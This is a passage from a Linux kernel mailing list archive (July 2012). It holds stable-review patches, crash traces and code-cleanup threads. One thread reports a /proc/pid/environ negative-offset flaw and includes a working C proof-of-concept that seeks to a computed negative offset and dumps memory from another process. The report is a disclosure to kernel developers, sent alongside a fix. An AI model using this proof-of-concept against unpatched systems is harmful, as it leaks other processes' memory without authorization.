So we need to make sure that an hrtimer interrupt always sees a
consistent state of time and offsets.

ktime_get_update_offsets() allows us to get the current monotonic time
and update the per cpu hrtimer base offsets from hrtimer_interrupt()
to capture a consistent state of monotonic time and the offsets. The
function replaces the existing ktime_get() calls in hrtimer_interrupt().

The overhead of the new function vs. ktime_get() is minimal as it just
adds two store operations.

This ensures that any changes to realtime or boottime offsets are
noticed and stored into the per-cpu hrtimer base structures, prior to
any hrtimer expiration and guarantees that timers are not expired early.

Signed-off-by: John Stultz 
Reviewed-by: Ingo Molnar 
Acked-by: Peter Zijlstra 
Acked-by: Prarit Bhargava 
Link: 
http://lkml.kernel.org/r/1341960205-56738-8-git-send-email-johns...@us.ibm.com
Signed-off-by: Thomas Gleixner 
Signed-off-by: Ben Hutchings 
---
 kernel/hrtimer.c |   28 ++--
 1 file changed, 14 insertions(+), 14 deletions(-)

diff --git a/kernel/hrtimer.c b/kernel/hrtimer.c
index 8f320af..6db7a5e 100644
--- a/kernel/hrtimer.c
+++ b/kernel/hrtimer.c
@@ -657,6 +657,14 @@ static inline int hrtimer_enqueue_reprogram(struct hrtimer 
*timer,
return 0;
 }
 
+static inline ktime_t hrtimer_update_base(struct hrtimer_cpu_base *base)
+{
+   ktime_t *offs_real = &base->clock_base[HRTIMER_BASE_REALTIME].offset;
+   ktime_t *offs_boot = &base->clock_base[HRTIMER_BASE_BOOTTIME].offset;
+
+   return ktime_get_update_offsets(offs_real, offs_boot);
+}
+
 /*
  * Retrigger next event is called after clock was set
  *
@@ -665,22 +673,12 @@ static inline int hrtimer_enqueue_reprogram(struct 
hrtimer *timer,
 static void retrigger_next_event(void *arg)
 {
struct hrtimer_cpu_base *base = &__get_cpu_var(hrtimer_bases);
-   struct timespec realtime_offset, xtim, wtm, sleep;
 
if (!hrtimer_hres_active())
return;
 
-   /* Optimized out for !HIGH_RES */
-   get_xtime_and_monotonic_and_sleep_offset(&xtim, &wtm, &sleep);
-   set_normalized_timespec(&realtime_offset, -wtm.tv_sec, -wtm.tv_nsec);
-
-   /* Adjust CLOCK_REALTIME offset */
raw_spin_lock(&base->lock);
-   base->clock_base[HRTIMER_BASE_REALTIME].offset =
-   timespec_to_ktime(realtime_offset);
-   base->clock_base[HRTIMER_BASE_BOOTTIME].offset =
-   timespec_to_ktime(sleep);
-
+   hrtimer_update_base(base);
hrtimer_force_reprogram(base, 0);
raw_spin_unlock(&base->lock);
 }
@@ -710,7 +708,6 @@ static int hrtimer_switch_to_hres(void)
base->clock_base[i].resolution = KTIME_HIGH_RES;
 
tick_setup_sched_timer();
-
/* "Retrigger" the interrupt to get things going */
retrigger_next_event(NULL);
local_irq_restore(flags);
@@ -1264,7 +1261,7 @@ void hrtimer_interrupt(struct clock_event_device *dev)
dev->next_event.tv64 = KTIME_MAX;
 
raw_spin_lock(&cpu_base->lock);
-   entry_time = now = ktime_get();
+   entry_time = now = hrtimer_update_base(cpu_base);
 retry:
expires_next.tv64 = KTIME_MAX;
/*
@@ -1342,9 +1339,12 @@ retry:
 * We need to prevent that we loop forever in the hrtimer
 * interrupt routine. We give it 3 attempts to avoid
 * overreacting on some spurious event.
+*
+* Acquire base lock for updating the offsets and retrieving
+* the current time.
 */
raw_spin_lock(&cpu_base->lock);
-   now = ktime_get();
+   now = hrtimer_update_base(cpu_base);
cpu_base->nr_retries++;
if (++retries < 3)
goto retry;


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 076/108] timekeeping: Fix CLOCK_MONOTONIC inconsistency during leapsecond

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: John Stultz 

This is a backport of fad0c66c4bb836d57a5f125ecd38bed653ca863a
which resolves a bug the previous commit.

Commit 6b43ae8a61 (ntp: Fix leap-second hrtimer livelock) broke the
leapsecond update of CLOCK_MONOTONIC. The missing leapsecond update to
wall_to_monotonic causes discontinuities in CLOCK_MONOTONIC.

Adjust wall_to_monotonic when NTP inserted a leapsecond.

Reported-by: Richard Cochran 
Signed-off-by: John Stultz 
Tested-by: Richard Cochran 
Link: 
http://lkml.kernel.org/r/1338400497-12420-1-git-send-email-john.stu...@linaro.org
Signed-off-by: Thomas Gleixner 
Cc: Prarit Bhargava 
Cc: Thomas Gleixner 
Cc: Linux Kernel 
Signed-off-by: John Stultz 
Signed-off-by: Ben Hutchings 
---
 kernel/time/timekeeping.c |3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
index 4780a7d..5c9b67e 100644
--- a/kernel/time/timekeeping.c
+++ b/kernel/time/timekeeping.c
@@ -938,6 +938,7 @@ static cycle_t logarithmic_accumulation(cycle_t offset, int 
shift)
xtime.tv_sec++;
leap = second_overflow(xtime.tv_sec);
xtime.tv_sec += leap;
+   wall_to_monotonic.tv_sec -= leap;
}
 
/* Accumulate raw time */
@@ -1048,7 +1049,7 @@ static void update_wall_time(void)
xtime.tv_sec++;
leap = second_overflow(xtime.tv_sec);
xtime.tv_sec += leap;
-
+   wall_to_monotonic.tv_sec -= leap;
}
 
/* check to see if there is a new clocksource to use */


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 097/108] eCryptfs: Fix lockdep warning in miscdev operations

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Tyler Hicks 

commit 60d65f1f07a7d81d3eb3b91fc13fca80f2fdbb12 upstream.

Don't grab the daemon mutex while holding the message context mutex.
Addresses this lockdep warning:

 ecryptfsd/2141 is trying to acquire lock:
  (&ecryptfs_msg_ctx_arr[i].mux){+.+.+.}, at: [] 
ecryptfs_miscdev_read+0x143/0x470 [ecryptfs]

 but task is already holding lock:
  (&(*daemon)->mux){+.+...}, at: [] 
ecryptfs_miscdev_read+0x21c/0x470 [ecryptfs]

 which lock already depends on the new lock.

 the existing dependency chain (in reverse order) is:

 -> #1 (&(*daemon)->mux){+.+...}:
[] lock_acquire+0x9d/0x220
[] __mutex_lock_common+0x5a/0x4b0
[] mutex_lock_nested+0x44/0x50
[] ecryptfs_send_miscdev+0x97/0x120 [ecryptfs]
[] ecryptfs_send_message+0x134/0x1e0 [ecryptfs]
[] ecryptfs_generate_key_packet_set+0x2fe/0xa80 
[ecryptfs]
[] ecryptfs_write_metadata+0x108/0x250 [ecryptfs]
[] ecryptfs_create+0x130/0x250 [ecryptfs]
[] vfs_create+0xb4/0x120
[] do_last+0x8c5/0xa10
[] path_openat+0xd9/0x460
[] do_filp_open+0x42/0xa0
[] do_sys_open+0xf8/0x1d0
[] sys_open+0x21/0x30
[] system_call_fastpath+0x16/0x1b

 -> #0 (&ecryptfs_msg_ctx_arr[i].mux){+.+.+.}:
[] __lock_acquire+0x1bf8/0x1c50
[] lock_acquire+0x9d/0x220
[] __mutex_lock_common+0x5a/0x4b0
[] mutex_lock_nested+0x44/0x50
[] ecryptfs_miscdev_read+0x143/0x470 [ecryptfs]
[] vfs_read+0xb3/0x180
[] sys_read+0x4d/0x90
[] system_call_fastpath+0x16/0x1b

Signed-off-by: Tyler Hicks 
Signed-off-by: Ben Hutchings 
---
 fs/ecryptfs/miscdev.c |   25 +
 1 file changed, 13 insertions(+), 12 deletions(-)

--- a/fs/ecryptfs/miscdev.c
+++ b/fs/ecryptfs/miscdev.c
@@ -195,31 +195,32 @@ int ecryptfs_send_miscdev(char *data, si
  struct ecryptfs_msg_ctx *msg_ctx, u8 msg_type,
  u16 msg_flags, struct ecryptfs_daemon *daemon)
 {
-   int rc = 0;
+   struct ecryptfs_message *msg;
 
-   mutex_lock(&msg_ctx->mux);
-   msg_ctx->msg = kmalloc((sizeof(*msg_ctx->msg) + data_size),
-  GFP_KERNEL);
-   if (!msg_ctx->msg) {
-   rc = -ENOMEM;
+   msg = kmalloc((sizeof(*msg) + data_size), GFP_KERNEL);
+   if (!msg) {
printk(KERN_ERR "%s: Out of memory whilst attempting "
   "to kmalloc(%zd, GFP_KERNEL)\n", __func__,
-  (sizeof(*msg_ctx->msg) + data_size));
-   goto out_unlock;
+  (sizeof(*msg) + data_size));
+   return -ENOMEM;
}
+
+   mutex_lock(&msg_ctx->mux);
+   msg_ctx->msg = msg;
msg_ctx->msg->index = msg_ctx->index;
msg_ctx->msg->data_len = data_size;
msg_ctx->type = msg_type;
memcpy(msg_ctx->msg->data, data, data_size);
msg_ctx->msg_size = (sizeof(*msg_ctx->msg) + data_size);
-   mutex_lock(&daemon->mux);
list_add_tail(&msg_ctx->daemon_out_list, &daemon->msg_ctx_out_queue);
+   mutex_unlock(&msg_ctx->mux);
+
+   mutex_lock(&daemon->mux);
daemon->num_queued_msg_ctx++;
wake_up_interruptible(&daemon->wait);
mutex_unlock(&daemon->mux);
-out_unlock:
-   mutex_unlock(&msg_ctx->mux);
-   return rc;
+
+   return 0;
 }
 
 /**


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 000/108] 3.2.24-stable review

2012-07-22 Thread Ben Hutchings
This is the start of the stable review cycle for the 3.2.24 release.
There are 108 patches in this series, which will be posted as responses
to this one.  If anyone has any issues with these being applied, please
let me know.

Responses should be made by Wed Jul 25 02:00:00 UTC 2012.
Anything received after that time might be too late.

A combined patch relative to 3.2.23 will be posted as an additional
response to this, and the diffstat can be found below.

Ben.

-
 Makefile  |4 +-
 arch/arm/plat-samsung/adc.c   |8 +-
 arch/mips/include/asm/thread_info.h   |4 +-
 arch/mips/kernel/vmlinux.lds.S|3 +-
 arch/powerpc/include/asm/cputime.h|6 +-
 arch/powerpc/kernel/time.c|   10 +-
 arch/x86/kernel/acpi/boot.c   |   27 +-
 arch/x86/kernel/reboot.c  |8 +
 block/scsi_ioctl.c|5 +-
 drivers/acpi/processor_core.c |6 +-
 drivers/acpi/sleep.c  |4 +-
 drivers/acpi/sysfs.c  |4 +-
 drivers/gpio/gpio-wm8994.c|5 +-
 drivers/gpu/drm/i915/intel_display.c  |4 +-
 drivers/hid/hid-apple.c   |6 +
 drivers/hid/hid-core.c|7 +
 drivers/hid/hid-ids.h |6 +
 drivers/hwmon/it87.c  |2 +-
 drivers/hwspinlock/hwspinlock_core.c  |4 +-
 drivers/input/joystick/xpad.c |6 +-
 drivers/input/mouse/bcm5974.c |   20 ++
 drivers/iommu/amd_iommu.c |7 +
 drivers/iommu/amd_iommu_init.c|3 +-
 drivers/md/dm-raid1.c |3 +-
 drivers/md/dm-region-hash.c   |5 +-
 drivers/md/md.c   |   36 ++-
 drivers/md/raid1.c|   13 +-
 drivers/md/raid5.c|4 +-
 drivers/media/dvb/dvb-core/dvbdev.c   |1 +
 drivers/mtd/nand/nandsim.c|   12 +-
 drivers/net/bonding/bond_debugfs.c|2 +-
 drivers/net/bonding/bond_main.c   |9 +-
 drivers/net/ethernet/atheros/atl1c/atl1c_main.c   |1 -
 drivers/net/ethernet/broadcom/bnx2x/bnx2x.h   |   15 --
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c   |   36 ++-
 drivers/net/ethernet/broadcom/tg3.c   |3 +-
 drivers/net/ethernet/intel/e1000e/82571.c |3 +
 drivers/net/ethernet/realtek/r8169.c  |3 +
 drivers/net/ethernet/stmicro/stmmac/stmmac_main.c |3 +
 drivers/net/macvtap.c |   57 +++--
 drivers/net/usb/ipheth.c  |5 +
 drivers/net/wireless/brcm80211/brcmsmac/main.c|3 +-
 drivers/net/wireless/ipw2x00/ipw.h|   23 ++
 drivers/net/wireless/ipw2x00/ipw2100.c|4 +
 drivers/net/wireless/ipw2x00/ipw2200.c|4 +
 drivers/net/wireless/iwlegacy/iwl-4965-sta.c  |4 +-
 drivers/net/wireless/iwlegacy/iwl-core.c  |   14 +-
 drivers/net/wireless/rt2x00/rt2x00usb.c   |2 +-
 drivers/net/wireless/rtl818x/rtl8187/leds.c   |2 +-
 drivers/pci/pci-driver.c  |   12 +
 drivers/pci/pci.c |5 -
 drivers/pci/quirks.c  |   26 --
 drivers/platform/x86/intel_ips.c  |   22 ++
 drivers/platform/x86/samsung-laptop.c |  225 +
 drivers/rtc/rtc-mxc.c |5 +-
 drivers/scsi/aic94xx/aic94xx_task.c   |2 +-
 drivers/scsi/libsas/sas_ata.c |   12 +-
 drivers/target/target_core_cdb.c  |2 +-
 drivers/target/target_core_pr.c   |7 +-
 drivers/target/tcm_fc/tfc_cmd.c   |2 +
 drivers/usb/class/cdc-wdm.c   |2 +
 drivers/usb/core/hub.c|   18 +-
 drivers/usb/host/xhci-hub.c   |   44 +++-
 drivers/usb/host/xhci.h   |6 +-
 drivers/usb/serial/option.c   |   26 ++
 drivers/vhost/vhost.c |2 +
 fs/buffer.c   |   22 +-
 fs/cifs/connect.c |   18 ++
 fs/cifs/readdir.c |7 +-
 fs/ecryptfs/kthread.c |2 +-
 fs/ecryptfs/miscdev.c |   48 ++--
 fs/eventpoll.c|4 +-
 fs/exofs/ore.c|8 +-
 fs/exofs/ore_raid.c   |   67

Re: [PATCH] net, cgroup: Fix boot failure due to iteration of uninitialized list

2012-07-22 Thread Gao feng
于 2012年07月20日 00:27, Srivatsa S. Bhat 写道:
> After commit ef209f15 (net: cgroup: fix access the unallocated memory in
> netprio cgroup), boot fails with the following NULL pointer dereference:
> 
> Initializing cgroup subsys devices
> Initializing cgroup subsys freezer
> Initializing cgroup subsys net_cls
> Initializing cgroup subsys blkio
> Initializing cgroup subsys perf_event
> Initializing cgroup subsys net_prio
> BUG: unable to handle kernel NULL pointer dereference at 0698
> IP: [] cgrp_create+0xf6/0x190
> PGD 0
> Oops:  [#1] SMP
> CPU 0
> Modules linked in:
> 
> Pid: 0, comm: swapper/0 Not tainted 3.5.0-rc7-mandeep #1 IBM IBM System x 
> -[7870C4Q]-/68Y8033
> RIP: 0010:[]  [] cgrp_create+0xf6/0x190
> RSP: :81a01ea8  EFLAGS: 00010213
> RAX:  RBX: ff10 RCX: 
> RDX:  RSI: 0246 RDI: 81aa70a0
> RBP: 81a01ed8 R08:  R09: 
> R10: 8808ff8641c0 R11: 6e697a696c616974 R12: 0001
> R13: 8808ff8641c0 R14:  R15: 00093970
> FS:  () GS:8808ffc0() knlGS:
> CS:  0010 DS:  ES:  CR0: 8005003b
> CR2: 0698 CR3: 01a0b000 CR4: 06b0
> DR0:  DR1:  DR2: 
> DR3:  DR6: 0ff0 DR7: 0400
> Process swapper/0 (pid: 0, threadinfo 81a0, task 81a13420)
> Stack:
>  81a01eb8 818060ff 81d75ec8 81aa8960
>  81aa8960 81b4c2c0 81a01ef8 81b1cb78
>  0018 0048 81a01f18 81b1ce13
> Call Trace:
>  [] cgroup_init_subsys+0x83/0x169
>  [] cgroup_init+0x36/0x119
>  [] start_kernel+0x3ba/0x3ef
>  [] ? kernel_init+0x27b/0x27b
>  [] x86_64_start_reservations+0x131/0x136
>  [] x86_64_start_kernel+0x103/0x112
> Code: 01 48 3d f8 e1 ec 81 48 8d 98 10 ff ff ff 75 1b eb 73 0f 1f 00 48 8b 83 
> f0 00 00 00 48 3d f8 e1 ec 81 48 8d 98 10 ff ff ff 74 5a <48> 8b 83 88 07 00 
> 00 48 85 c0 74 de 44 3b 60 10 76 d8 44 89 e6
> RIP  [] cgrp_create+0xf6/0x190
>  RSP 
> CR2: 0698
> ---[ end trace a7919e7f17c0a725 ]---
> Kernel panic - not syncing: Attempted to kill the idle task!
> 
> The code corresponds to:
> 
> update_netdev_tables():
> for_each_netdev(&init_net, dev) {
> map = rtnl_dereference(dev->priomap);  < HERE
> 
> 
> The list head is initialized in netdev_init(), which is called much
> later than cgrp_create(). So the problem is that we are calling
> update_netdev_tables() way too early (in cgrp_create()), which will
> end up traversing the not-yet-circular linked list. So at some point,
> the dev pointer will become NULL and hence dev->priomap becomes an
> invalid access.
> 
> To fix this, just remove the update_netdev_tables() function entirely,
> since it appears that write_update_netdev_table() will handle things
> just fine.

The reason I add update_netdev_tables in cgrp_create is to avoid additional
bound checkings when we accessing the dev->priomap.priomap.

Eric,can we revert this commit 91c68ce2b26319248a32d7baa1226f819d283758 now?
I think it's safe enough to access priomap without bound check.

Thanks
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCH] proc: do not allow negative offsets on /proc//environ

2012-07-22 Thread Djalal Harouni
Hi Oleg,

On Sun, Jul 22, 2012 at 10:00:49PM +0200, Oleg Nesterov wrote:
> On 07/22, Djalal Harouni wrote:
> >
> > __mem_open() which is called by both /proc//environ and
> > /proc//mem ->open() handlers will allow the use of negative offsets.
> > /proc//mem has negative offsets but not /proc//environ.
> 
> Probablt the patch makes sense, but I can't understand the changelog...
> 
> > Allowing negative offsets on /proc//environ can turn it to act like
> > /proc//mem. A negative offset will pass the
> > fs/read_write.c:lseek_execute() and the environ_read() checks and will
> > point to another VMA.
> 
> which VMA?
It depends on the offset. Please see below.

> environ_read() can only read the memory from [env_start, env_end], and
> it should check *ppos anyway to ensure it doesn't read something else.
Yes I agree, but currently that's not the case, there are no checks on *ppos.
So if you pass a negative offset you will be able to read from an arbitrary
address.

I'll send another patch tomorrow to add the checks for *ppos.



Since negative offsets are allowed we can pass it to lseek():

1) ->llseek()
 -> generic_file_llseek()
-> generic_file_llseek_size()
   -> lseek_execute()

  inside fs/read_write.c:lseek_execute() we pass the two checks and
  file->f_pos will be updated.


2) ->read()
 -> environ_read()

  inside environ_read() there is only a one check:

  int this_len = mm->env_end - (mm->env_start + src);
  
  if (this_len <= 0)
break;


  Here 'src' is 'src = *ppos' the negative offset converted to unsigned long
  and (mm->env_start + src) can overflow and point to another VMA.

  int this_len = mm->env_end - (mm->env_start + src)
  
  'this_len' will be positive and we pass that check.


I also don't like the truncation of the result to 'int this_len'



A quick example to reproduce it:
New kernels /proc//stat include 'mm->env_start', third number from
the end.

To read the .text area from 0x0040:
 0x0040 - (mm->env_start == 140733359794601) = negative_offset

$ ./mem_environ /proc/$(pidof cat)/environ 140733359794601 | hexdump -C -v
  7f 45 4c 46 02 01 01 00  00 00 00 00 00 00 00 00  |.ELF|
0010  02 00 3e 00 01 00 00 00  a0 17 40 00 00 00 00 00  |..>...@.|
0020  40 00 00 00 00 00 00 00  40 c5 00 00 00 00 00 00  |@...@...|
...

mem_environ is just a program that calculats the negative offset,
open(/proc//environ), lseek() and read().

The source is attached, just run this command to test it:
$ ./mem_environ /proc/self/environ 0x0 | hexdump -C -v

In rare cases it will not work, I don't know why.

> >  static int mem_open(struct inode *inode, struct file *file)
> >  {
> > -   return __mem_open(inode, file, PTRACE_MODE_ATTACH);
> > +   int ret = __mem_open(inode, file, PTRACE_MODE_ATTACH);
> > +   if (!ret)
> > +   /* OK to pass negative loff_t, we can catch out-of-range */
> > +   file->f_mode |= FMODE_UNSIGNED_OFFSET;
> > +
> > +   return ret;
> 
> I guess you can set FMODE_UNSIGNED_OFFSET unconditionally, it doesn't
> matter if __mem_open() fails. But I won't insist.
Sure.

> Oleg.
> 
Thanks Oleg. BTW should I resend the patch with a better changelog entry ?

I'll also add another patch to check the offsets inside environ_read().

-- 
tixxdz
http://opendz.org
/*
* /proc//environ like /proc//mem
* 
* Author: Djalal Harouni   tixxdz  opendz.org
* License: GPLv2
* 
* 
* (mm->env_start + src) will point to your page.
* src is the offset
* For 64bits: A negative offset.
* For 32bits: Did not test, can we wrap ?
*
*/

#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define SYS_lseek   8

extern char **environ;

/* use **environ against a non -fPIC elf */
static inline loff_t get_offset(unsigned long env_addr)
{
	unsigned long load_addr = 0x0040;
	return (load_addr - env_addr);
}

static loff_t kernel_lseek(int fd, loff_t offset)
{
	return syscall(SYS_lseek, fd, offset, SEEK_SET);
}

static int leak(char *proc_file, unsigned long env_start)
{
	int ret;
	int i, fd;
	char buf[4096];
	loff_t offset = 0;

	memset(buf, 0, sizeof(buf));

	ret = -1;
	fd = open(proc_file, O_RDONLY);
	if (fd == -1) {
		perror("open");
		return ret;
	}

	if (env_start)
		offset = get_offset(env_start);

	if (!offset)
		/* really ? */
		offset = get_offset((unsigned long)*environ);

	if (kernel_lseek(fd, offset) == (off_t) -1) {
		perror("lseek");
		return ret;
	}

	ret = read(fd, buf, sizeof(buf));
	if (ret == -1) {
		perror("read");
		return ret;
	}
	close(fd);

	for (i = 0; i < sizeof(buf); i++)
		printf("%c", buf[i]);
	return 0;
}

int main(int argc, char **argv)
{
	unsigned long env_addr = 0;

	if (argc < 3) {
		printf("%s  /proc//environ env_addr\n"
		"/proc//environ.\n"
		"env_addr: start of environment\n", argv[0]);
		return 0;
	}

	env_addr = (unsigned long) strtoul(argv[2], NULL, 0);
	return leak(argv[1], env_addr);
}


RE: [PATCH] regulator: lp8788-buck: Remove lp8788_set_default_dvs_ctrl_mode function

2012-07-22 Thread Kim, Milo
> We already know the mask in lp8788_init_dvs() function, and we can
> update
> the corresponding bit for default_dvs_mode in lp8788_init_dvs()
> function.
> This function looks not necessary to me.
> 
> Signed-off-by: Axel Lin 

Acked-by: Milo(Woogyom) Kim 
Tested-by: Milo(Woogyom) Kim 

Thanks for catching this !

Best Regards,
Milo


[PATCH] staging/vme: fix checkpatch warnings

2012-07-22 Thread Toshiaki Yamane
Now checkpatch clean.

$ find drivers/staging/vme -name "*.[ch]"|xargs ./scripts/checkpatch.pl \
-f --terse --nosummary|cut -f3- -d":"|sort |uniq -c|sort -n
  1  ERROR: trailing whitespace
  2  WARNING: Prefer pr_debug(... to printk(KERN_DEBUG, ...
  5  WARNING: Prefer pr_info(... to printk(KERN_INFO, ...
  7  WARNING: Prefer pr_err(... to printk(KERN_ERR, ...
  9  WARNING: quoted string split across lines
 13  WARNING: Prefer pr_warn(... to printk(KERN_WARNING, ...

Signed-off-by: Toshiaki Yamane 
---
 drivers/staging/vme/devices/vme_pio2_core.c |   10 ++--
 drivers/staging/vme/devices/vme_user.c  |   71 ---
 2 files changed, 36 insertions(+), 45 deletions(-)

diff --git a/drivers/staging/vme/devices/vme_pio2_core.c 
b/drivers/staging/vme/devices/vme_pio2_core.c
index 4bf8e05..dad8281 100644
--- a/drivers/staging/vme/devices/vme_pio2_core.c
+++ b/drivers/staging/vme/devices/vme_pio2_core.c
@@ -10,6 +10,8 @@
  * option) any later version.
  */
 
+#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+
 #include 
 #include 
 #include 
@@ -163,15 +165,13 @@ static int __init pio2_init(void)
int retval = 0;
 
if (bus_num == 0) {
-   printk(KERN_ERR "%s: No cards, skipping registration\n",
-   driver_name);
+   pr_err("No cards, skipping registration\n");
goto err_nocard;
}
 
if (bus_num > PIO2_CARDS_MAX) {
-   printk(KERN_ERR
-   "%s: Driver only able to handle %d PIO2 Cards\n",
-   driver_name, PIO2_CARDS_MAX);
+   pr_err("Driver only able to handle %d PIO2 Cards\n",
+  PIO2_CARDS_MAX);
bus_num = PIO2_CARDS_MAX;
}
 
diff --git a/drivers/staging/vme/devices/vme_user.c 
b/drivers/staging/vme/devices/vme_user.c
index e25645e..7d28086 100644
--- a/drivers/staging/vme/devices/vme_user.c
+++ b/drivers/staging/vme/devices/vme_user.c
@@ -15,6 +15,8 @@
  * option) any later version.
  */
 
+#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+
 #include 
 #include 
 #include 
@@ -170,7 +172,7 @@ static int vme_user_open(struct inode *inode, struct file 
*file)
mutex_lock(&image[minor].mutex);
/* Allow device to be opened if a resource is needed and allocated. */
if (minor < CONTROL_MINOR && image[minor].resource == NULL) {
-   printk(KERN_ERR "No resources allocated for device\n");
+   pr_err("No resources allocated for device\n");
err = -EINVAL;
goto err_res;
}
@@ -225,13 +227,13 @@ static ssize_t resource_to_user(int minor, char __user 
*buf, size_t count,
(unsigned long)copied);
if (retval != 0) {
copied = (copied - retval);
-   printk(KERN_INFO "User copy failed\n");
+   pr_info("User copy failed\n");
return -EINVAL;
}
 
} else {
/* XXX Need to write this */
-   printk(KERN_INFO "Currently don't support large transfers\n");
+   pr_info("Currently don't support large transfers\n");
/* Map in pages from userspace */
 
/* Call vme_master_read to do the transfer */
@@ -265,7 +267,7 @@ static ssize_t resource_from_user(unsigned int minor, const 
char __user *buf,
image[minor].kern_buf, copied, *ppos);
} else {
/* XXX Need to write this */
-   printk(KERN_INFO "Currently don't support large transfers\n");
+   pr_info("Currently don't support large transfers\n");
/* Map in pages from userspace */
 
/* Call vme_master_write to do the transfer */
@@ -286,7 +288,7 @@ static ssize_t buffer_to_user(unsigned int minor, char 
__user *buf,
retval = __copy_to_user(buf, image_ptr, (unsigned long)count);
if (retval != 0) {
retval = (count - retval);
-   printk(KERN_WARNING "Partial copy to userspace\n");
+   pr_warn("Partial copy to userspace\n");
} else
retval = count;
 
@@ -305,7 +307,7 @@ static ssize_t buffer_from_user(unsigned int minor, const 
char __user *buf,
retval = __copy_from_user(image_ptr, buf, (unsigned long)count);
if (retval != 0) {
retval = (count - retval);
-   printk(KERN_WARNING "Partial copy to userspace\n");
+   pr_warn("Partial copy to userspace\n");
} else
retval = count;
 
@@ -396,7 +398,7 @@ static ssize_t vme_user_write(struct file *file, const char 
__user *buf,
default:
retval = -EINVAL;
}
-   
+
mutex_unlock(&image[minor].mutex);
 
if (retval > 0)
@@ -476,7 +478,7 @@ static int vme_user_ioctl(struct inode *inode, struct file 
*file,
  

Re: [PATCH] sctp: Make "Invalid Stream Identifier" ERROR follows SACK when bundling

2012-07-22 Thread Neil Horman
On Thu, Jul 19, 2012 at 01:57:30PM +0800, xufengzhang.m...@gmail.com wrote:
> When "Invalid Stream Identifier" ERROR happens after process the
> received DATA chunks, this ERROR chunk is enqueued into outqueue
> before SACK chunk, so when bundling ERROR chunk with SACK chunk,
> the ERROR chunk is always placed first in the packet because of
> the chunk's position in the outqueue.
> This violates sctp specification:
> RFC 4960 6.5. Stream Identifier and Stream Sequence Number
> ...The endpoint may bundle the ERROR chunk in the same
> packet as the SACK as long as the ERROR follows the SACK.
> So we must place SACK first when bundling "Invalid Stream Identifier"
> ERROR and SACK in one packet.
> Although we can do that by enqueue SACK chunk into outqueue before
> ERROR chunk, it will violate the side-effect interpreter processing.
> It's easy to do this job when dequeue chunks from the outqueue,
> by this way, we introduce a flag 'has_isi_err' which indicate
> whether or not the "Invalid Stream Identifier" ERROR happens.
> 
> Signed-off-by: Xufeng Zhang 

Not sure I understand how you came into this error.  If we get an invalid
stream, we issue an SCTP_REPORT_TSN side effect, followed by an SCTP_CMD_REPLY
which sends the error chunk.  The reply goes through
sctp_outq_tail->sctp_outq_chunk->sctp_outq_transmit_chunk->sctp_outq_append_chunk.
That last function checks to see if a sack is already part of the packet, and if
there isn't one, appends one, using the updated tsn map.  So Can you explain in
some more detail how you're getting into this situation?

Thanks!
Neil

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[RESEND RFC 1/3] mm: use get_page_migratetype instead of page_private

2012-07-22 Thread Minchan Kim
page allocator uses set_page_private and page_private for handling
migratetype when it frees page. Let's replace them with [set|get]
_page_migratetype to make it more clear.

Signed-off-by: Minchan Kim 
---
 include/linux/mm.h  |   10 ++
 mm/page_alloc.c |   11 +++
 mm/page_isolation.c |2 +-
 3 files changed, 18 insertions(+), 5 deletions(-)

diff --git a/include/linux/mm.h b/include/linux/mm.h
index 5c76634..86d61d6 100644
--- a/include/linux/mm.h
+++ b/include/linux/mm.h
@@ -249,6 +249,16 @@ struct inode;
 #define page_private(page) ((page)->private)
 #define set_page_private(page, v)  ((page)->private = (v))
 
+static inline void set_page_migratetype(struct page *page, int migratetype)
+{
+   set_page_private(page, migratetype);
+}
+
+static inline int get_page_migratetype(struct page *page)
+{
+   return page_private(page);
+}
+
 /*
  * FIXME: take this include out, include page-flags.h in
  * files which need it (119 of them)
diff --git a/mm/page_alloc.c b/mm/page_alloc.c
index 710d91c..103ba66 100644
--- a/mm/page_alloc.c
+++ b/mm/page_alloc.c
@@ -671,8 +671,10 @@ static void free_pcppages_bulk(struct zone *zone, int 
count,
/* must delete as __free_one_page list manipulates */
list_del(&page->lru);
/* MIGRATE_MOVABLE list may include MIGRATE_RESERVEs */
-   __free_one_page(page, zone, 0, page_private(page));
-   trace_mm_page_pcpu_drain(page, 0, page_private(page));
+   __free_one_page(page, zone, 0,
+   get_page_migratetype(page));
+   trace_mm_page_pcpu_drain(page, 0,
+   get_page_migratetype(page));
} while (--to_free && --batch_free && !list_empty(list));
}
__mod_zone_page_state(zone, NR_FREE_PAGES, count);
@@ -731,6 +733,7 @@ static void __free_pages_ok(struct page *page, unsigned int 
order)
__count_vm_events(PGFREE, 1 << order);
free_one_page(page_zone(page), page, order,
get_pageblock_migratetype(page));
+
local_irq_restore(flags);
 }
 
@@ -1134,7 +1137,7 @@ static int rmqueue_bulk(struct zone *zone, unsigned int 
order,
if (!is_migrate_cma(mt) && mt != MIGRATE_ISOLATE)
mt = migratetype;
}
-   set_page_private(page, mt);
+   set_page_migratetype(page, mt);
list = &page->lru;
}
__mod_zone_page_state(zone, NR_FREE_PAGES, -(i << order));
